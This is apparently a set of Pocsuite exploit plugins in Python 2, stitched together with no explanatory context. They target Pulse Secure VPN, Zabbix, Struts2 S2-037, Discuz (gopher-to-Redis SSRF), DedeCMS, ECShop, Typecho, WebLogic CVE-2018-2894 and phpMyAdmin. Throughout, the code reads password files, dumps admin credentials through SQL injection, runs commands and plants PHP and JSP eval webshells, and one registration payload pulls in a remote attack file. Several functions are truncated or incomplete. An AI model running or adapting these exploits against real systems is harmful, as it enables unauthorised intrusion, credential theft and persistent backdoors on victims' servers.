def get_user_password(self): payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \ "/dana/html5acc/guacamole/" payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \ "/dana/html5acc/guacamole/" headers = { "User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1" } try: plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, timeout=(10, 15)).text except Exception as e: plantextpasswd = '' try: userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text except Exception as e: userhash = '' return plantextpasswd, userhash
def _verify(self): try: result = {} headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'} payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(surname),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" att_url = self.url + payload response = req.get(att_url,headers=headers,timeout=10) #获取用户名 info_name = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content) #获取密码 payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" att_url = self.url + payload response = req.get(att_url,timeout=10) info_pwd = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content) payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),32,32) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" att_url = self.url + payload response = req.get(att_url,timeout=10) info_pwd_end = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content) if info_name and info_pwd and info_pwd_end: username = info_name.group(1) password = info_pwd.group(1) + info_pwd_end.group(1) result['DBInfo'] = {} result['DBInfo']['Username'] = username result['DBInfo']['Password'] = password except Exception: pass return self.parse_attack(result)
def strust2_037(self,url): result = {} proxies = { # 'http':'http://127.0.0.1:8081', # 'https':'http://127.0.0.1:8081', } payload = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo vulnerable' vul_url = url + payload r = req.get(url=vul_url, allow_redirects=False, proxies=proxies,verify=False) output = r.content print output if 'vulnerable' in output: exp = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami' exp_url = url + exp r = req.get(url=exp_url, allow_redirects=False, proxies=proxies,verify=False) output = r.content print output if 'cmd=whoami' not in output: #print u"存在漏洞" result['VerifyInfo'] = {} result['name'] = 'strust2_037' result['VerifyInfo']['URL'] = url result['VerifyInfo']['Payload'] = payload else: result = {} result = {} return result
def TestingCms(self, url): dedehash = [ "/data/admin/ver.txt", "/data/admin/allowurl.txt", "/data/index.html", "/data/js/index.html", "/data/mytag/index.html", "/data/sessions/index.html", "/data/textdata/index.html", "/dede/action/css_body.css", "/dede/css_body.css", "/dede/templets/article_coonepage_rule.htm", "/include/alert.htm", "/member/images/base.css", "/member/js/box.js", "/php/modpage/readme.txt", "/plus/sitemap.html", "/setup/license.html", "/special/index.html", "/templets/default/style/dedecms.css", "/company/template/default/search_list.htm" ] for hashone in dedehash: try: dedehashone = url + hashone r = req.get(dedehashone, timeout=8) if r.status_code == 200: # print 'check cms is ok' dedehashone = url + '/' + hashone[1].upper() + hashone[2:] r = req.get(dedehashone, timeout=8) if r.status_code == 200: # print 'check os is ok' if self.GetBackUp(self.url) == 1: # print 'check short is ok' return 1 else: break else: break except: return 0 return 0
def _verify(self): result = {} user_list = ['root', 'admin'] password_list = ['root', '123456', '12345678', 'password', 'passwd', '123'] target_url = '' try: response = req.get(self.url) if 'phpMyAdmin' in response.content and '用户名' in response.content: target_url = str(self.url) + "/index.php" else: response = req.get(self.url + '/phpmyadmin/index.php') if 'input_password' in response.content and 'name="token"' in response.content: target_url = self.url + "/phpmyadmin/index.php" except Exception as e: print e for user in user_list: for password in password_list: try: result = self._netreq(target_url, user, password) if result: print "result=>",result return self.parse_output(result) except Exception as e: print e return self.parse_output(result)
def get_current_work_path(host): geturl = host + "/ws_utc/resources/setting/options/general" ua = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0' } values = [] try: resp = req.get(geturl) if resp.status_code == 404: exit("[-] {} don't exists CVE-2018-2894".format(host)) elif "Deploying Application".lower() in resp.text.lower(): print("[*] First Deploying Website Please wait a moment ...") time.sleep(20) resp = req.get(geturl, headers=ua) if "</defaultValue>" in resp.content: root = ET.fromstring(resp.content) value = root.find("section").find("options") for e in value: for sub in e: if e.tag == "parameter" and sub.tag == "defaultValue": values.append(sub.text) except req.ConnectionError: exit("[-] Cannot connect url: {}".format(geturl)) if values: return values[0] else: print("[-] Cannot get current work path\n") exit(resp.content)
def _attack(self): result = {} ### #!!!!The ssrf_url is one file i put it in discuz for test. #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well; ### ssrf_url = "ssrf_gopher.php?ssrf=" payload = ('gopher://127.0.0.1:6379/'\ '_eval "local t=redis.call(\'keys\',\'*_setting\');'\ 'for i,v in ipairs(t) do redis.call(\'set\',v,'\ '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\ 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\ 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\ 'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\ 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\ ' end;return 1;" 0 %250D%250Aquit') # tmpparse = urlparse.urlparse(self.url) if tmpparse.path != '': self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1] #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path] else: self.url = tmpparse.scheme + '://'+ tmpparse.netloc vul_url = self.url + '/' + ssrf_url + payload base_rep = req.get(vul_url) print base_rep.status_code while base_rep.status_code == 200: shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' print shell_url rep = req.get(shell_url) if rep.status_code == 200: shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();' shell_payload_b64 = base64.b64encode(shell_payload) attack_url= shell_url + '&a=' + shell_payload_b64 req.get(attack_url) flag = "phpinfo"; shell_url = self.url + '/' + 'shell.php' verify_url = shell_url + "?c1tas=phpinfo();" rep = req.get(verify_url) if rep.status_code == 200 and flag in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);' payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + '/' +ssrf_url +payload_flush req.get(recover_url) req.get(self.url + '/forum.php') break return self.parse_output(result)
def _attack(self): result = {} target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35' req.get(target) req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1') shell = req.get(self.url + '/plus/x.php') if shell.content.find('w'): result = {'VerifyInfo': {}} result['VerifyInfo']['shell'] = self.url + '/plus/x.php' result['VerifyInfo']['password'] = '******' return self.parse_result(result)
def _attack(self): result = {} ### #!!!!The ssrf_url is one file i put it in discuz for test. #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well; ### ssrf_url = "ssrf_gopher.php?ssrf=" payload = ('gopher://127.0.0.1:6379/'\ '_eval "local t=redis.call(\'keys\',\'*_setting\');'\ 'for i,v in ipairs(t) do redis.call(\'set\',v,'\ '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\ 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\ 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\ 'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\ 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\ ' end;return 1;" 0 %250D%250Aquit') # tmpparse = urlparse.urlparse(self.url) if tmpparse.path != '': self.url = tmpparse.scheme + '://' + tmpparse.netloc + '/' + tmpparse.path.split( '/')[1] #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path] else: self.url = tmpparse.scheme + '://' + tmpparse.netloc vul_url = self.url + '/' + ssrf_url + payload base_rep = req.get(vul_url) print base_rep.status_code while base_rep.status_code == 200: shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' print shell_url rep = req.get(shell_url) if rep.status_code == 200: shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();' shell_payload_b64 = base64.b64encode(shell_payload) attack_url = shell_url + '&a=' + shell_payload_b64 req.get(attack_url) flag = "phpinfo" shell_url = self.url + '/' + 'shell.php' verify_url = shell_url + "?c1tas=phpinfo();" rep = req.get(verify_url) if rep.status_code == 200 and flag in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);' payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + '/' + ssrf_url + payload_flush req.get(recover_url) req.get(self.url + '/forum.php') break return self.parse_output(result)
def check_shell(url, verifycode): shell_url = url + '/{}.php'.format(verifycode) r = req.get(shell_url) if r.status_code == 200 and hashlib.md5( verifycode).hexdigest() in r.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = urljoin( self.url, "/{}.php".format(verifycode)) req.get( urljoin( self.url, "/{}.php?cmd=rm -rf {}.php".format( verifycode, verifycode)))
def _attack(self): result = {} url_part = self.url.rpartition('/') payload = ( 'gopher://127.0.0.1:6379/xeval ' '"local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";' 'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";' 's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";' 's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}' 's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;' 'return 1;" 0 %250D%250Aquit') target_url = self.url + payload vul_rep = req.get(target_url) while vul_rep.status_code == 200: shell_url = url_part[ 0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' shell_rep = req.get(shell_url) if shell_rep.status_code == 200: random_sed = string.letters + string.digits flag = ''.join([random.choice(random_sed) for _ in range(8)]) shell_flag = ''.join( [random.choice(random_sed) for _ in range(8)]) #use system() write a shell php file and shell will retained after flushing redis apache shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php' shell_payload_b64 = base64.b64encode(shell_payload) #write a random php file req.get(shell_url + '&dshtanger=' + shell_payload_b64) #access this php file verify_url = url_part[0] + '/' + shell_flag + '.php' verify_rep = req.get(verify_url) if (verify_rep.status_code == 200) and (flag in verify_rep.content): result['ShellInfo'] = {} result['ShellInfo']['URL'] = verify_url result['ShellInfo'][ 'Content'] = '@eval($_POST[dshtanger]);' #recover website flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit' flush_url = self.url + flush_payload req.get(flush_url) test_url = url_part[0] + '/forum.php' req.get(test_url) break return self.parse_output(result)
def _verify(self, verify=True): vul_url = self.url result = {} headers = req.get(vul_url, timeout=10).headers file_len = headers["Content-Length"] headers = { "Range": "bytes=-{},-9223372036854{}".format( int(file_len) + 623, 776000 - (int(file_len) + 623)) } r = req.get(vul_url, headers=headers) if r.status_code == 206 and "Content-Range" in r.content: result['desc'] = "Vuln url" return self.parse_attack(result)
def _verify(self): '''verify mode''' vul_url = self.url proto, rest = urllib.splittype(vul_url) host, rest = urllib.splithost(rest) host, port = urllib.splitport(host) result = {} if port is None: vul_url = self.url + ":8888" target = vul_url + "/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd" response_code = req.get(target).status_code r = req.get(target) if response_code == 200 and "bin" in r.text and "/usr/sbin" in r.text and "root" in r.text: result['VerifyInfo'] = "success" pass return self.parse_output(result)
def _attack(self): try: result = {} #获取表前缀 table_pre = self.get_table_pre(self.url) if table_pre is None: return self.parse_attack(result) #获取url data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format( table_pre=table_pre) url = self.get_standard_url(data, self.url) pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~") for i in range(10): r = req.get(url) re_result = pattern.findall(r.content.decode(r.encoding)) if re_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = re_result[0][0] result['AdminInfo']['Password'] = re_result[0][1] return self.parse_attack(result) return self.parse_attack(result) except: import traceback traceback.print_exc()
def _attack(self): #定义返回结果 result = {} header = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Referer": self.url } payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==" data = { "__typecho_config":payload } #获取漏洞url vul_url = '%s' % self.url #获取处理后的url vul_url = self.url+"/install.php?finish=a" res = req.post(vul_url,headers=header,data=data) status = req.get(self.url+"/webshell.php").status_code if status == 200: result['VerifyInfo']={} result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0" result['VerifyInfo']['Payload']=data return self.save_output(result)
def _verify(self): # 调用指纹方法 result = {} #如果设置端口则取端口,没有设置则为默认端口 import re vul_url = "%s" % self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "7001" vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port) try: response = req.get(url=vul_ip, timeout=5, allow_redirects=False) #禁止重定向 if (response.status_code == 200 and "WSDL" in response.text): url = "/ws_utc/resources/setting/keystore" target = "http://%s:%s/" % (_host, _port) response = upload_webshell(target, url) if (response != ""): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = response return self.save_output(result) except Exception as e: print e pass return self.save_output(result)
def _verify(self): """verify mode""" result = {} random1 = random.randint(999, 9999) random2 = random.randint(999, 9999) random3 = random1 * random2 spliturl = self.url.split('/') targetUrl = spliturl[-1] targetUrl = '${{{0}*{1}}}'.format(random1, random2) + "/" + targetUrl finalUrl = "http://" for i in range(1, len(spliturl) - 1): if spliturl[i] != '': finalUrl = finalUrl + spliturl[i] + "/" finalUrl = finalUrl + targetUrl #print finalUrl matchstring = str(random3) #print random3 try: resp = req.get(finalUrl, allow_redirects=False) #print resp.headers if matchstring in resp.headers['location'].lower(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url except: pass return self.parse_output(result)
def _verify(self): #定义返回结果 result = {} #获取定义请求头 import random seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" sa = [] for i in range(8): sa.append(random.choice(seed)) salt = ''.join(sa) headers = { 'Host': salt, 'User-agent': salt, 'X-Forwarded-For': salt, 'cookie': salt, } proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } try: response = req.get(url=self.url, headers=headers, timeout=5, proxies=proxies) except Exception, e: response = ""
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url print vul_url if vul_url[-1] == '/': vul_url = vul_url[:-1] print vul_url #定义漏洞列表 # payload_url = [] # payload_content = [] payload_dict = {} final_url = [] #循环判断 for file in self.filelist: targetURL = vul_url + file #print vul_url + file try: r = req.get(url=targetURL, timeout=1,allow_redirects=False) #禁止重定向 r_text = r.text if r.status_code == 200: payload_dict[targetURL] = r_text # payload_url.append(targetURL) # payload_content.append(r_text) except Exception,e: print "error",e,targetURL
def _verify(self): result = {} url = self.url + "/index.php?m=member&c=index&a=register&siteid=1" username = randomStr(6) password = randomStr(6, '1234567890') data = { "siteid": "1", "modelid": "1", "username": "******" % (username), "password": "******" % (password), "email": "*****@*****.**" % (username), "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ", "dosubmit": "1", "protocol": "", } match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php" resp = req.post(url, data=data) shell = re.findall(match, resp.text) shellinfo = ''.join(shell[0]) + ".php" if shell: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url shell_resp = req.get(shellinfo) if shell_resp.status_code == 200: result['VerifyInfo']['webshell'] = shellinfo return self.parse_attack(result)
def _verify(self): result = {} self.raw_url = self.url host = urlparse.urlparse(self.url).hostname port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: port = "80" else: port = str(port) if "https" == scheme: self.url = "%s://%s" % (scheme, host) else: self.url = "%s://%s:%s" % (scheme, host, port) paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} try: res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15)) if "root:x:0:0:root" in res.text and res.status_code == 200: result["VerifyInfo"] = {} result["VerifyInfo"]["URL"] = self.url result["VerifyInfo"]["passwd"] = res.text result["VerifyInfo"]["host"] = self.get_hosts() except Exception as e: pass return self.parse_output(result)
def _verify(self): try: result = {} headers = { 'Referer': '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}''' } att_url = self.url + "/user.php?act=login" response = req.get(att_url, headers=headers, timeout=10) res = req.get(self.url + "/1.php", timeout=10) if res.status_code == 200: result['ShellInfo'] = {} result['ShellInfo']['URL'] = self.url + "/1.php" except Exception, e: pass
def _netreq(self, target_url, username, password): result = {} flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 'class="disableAjax" title='] for _ in range(10): res = req.get(url = target_url) set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0] token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0] cookie = '' for x,y in res.cookies.get_dict().items(): cookie = cookie + "{}={};".format(x,y) header = { "Content-Type":"application/x-www-form-urlencoded", "Cookie": cookie } payload = { "set_session": set_session, "pma_username": username, "pma_password": password, "server": "1", "target": "index.php", "token": token } payload = urllib.urlencode(payload) response = req.post(url = target_url, data=payload, headers=header) for flag in flag_list: if flag in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['Payload'] = payload return result return result
def vul_check(payload): url = urlparse.urljoin(base_url, payload) sock = socket.socket() sock.connect(("127.0.0.1", 8080)) sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii')) sock.send('Host: 127.0.0.1\r\n'.encode('ascii')) sock.send('\r\n'.encode('ascii')) str_five = 'testssdfsf' * 200 sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.close() get_verify_str = req.get(verify_url) return get_verify_str
def _verify(self): result = {} payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=\ &node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\ &link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\ Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7' vulurl = self.url + payload verurl = self.url + '/plugins/weathermap/configs/test.php' req.get(vulurl) req_ver = req.get(verurl) if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload return self.parse_attack(result)
def upload_webshell(host, uri): set_new_upload_path(host, get_new_work_path(host)) upload_content = "POC test" headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', } files = { "ks_edit_mode": "false", "ks_password_front": "test", "ks_password_changed": "true", "ks_filename": ("test.jsp", upload_content) } resp = req.post(host + uri, files=files) response = resp.text match = re.findall("<id>(.*?)</id>", response) if match: tid = match[-1] shell_path = host + "/ws_utc/css/config/keystore/" + str( tid) + "_test.jsp" if upload_content in req.get(shell_path, headers=headers).content: print shell_path return True else: return False else: return False
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url from urlparse import urlparse, urlunparse, urljoin urlinfo = urlparse(vul_url) check_url = urlunparse( (urlinfo.scheme, urlinfo.netloc, '/', '', '', '')) #print check_url payload_dict = {} final_url = [] for fckurl in self.fckdir: targetURL = urljoin(check_url, fckurl) #print targetURL try: r = req.get(url=targetURL, timeout=1, allow_redirects=False) #禁止重定向 # print targetURL,r.status_code if r.status_code in [200, 300, 202]: #print u"存在漏洞",targetURL # payload_url.append(targetURL) payload_dict[targetURL] = r.text except Exception, e: pass
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = '5984' #检测漏洞 url = 'http://%s:%s/_config/' % (_host, _port) try: req_code = req.get(url, timeout=5, allow_redirects=True, verify=False).status_code # print req_code if req_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = url except Exception as e: # return host print e pass print '[+]26 poc done' return self.save_output(result)
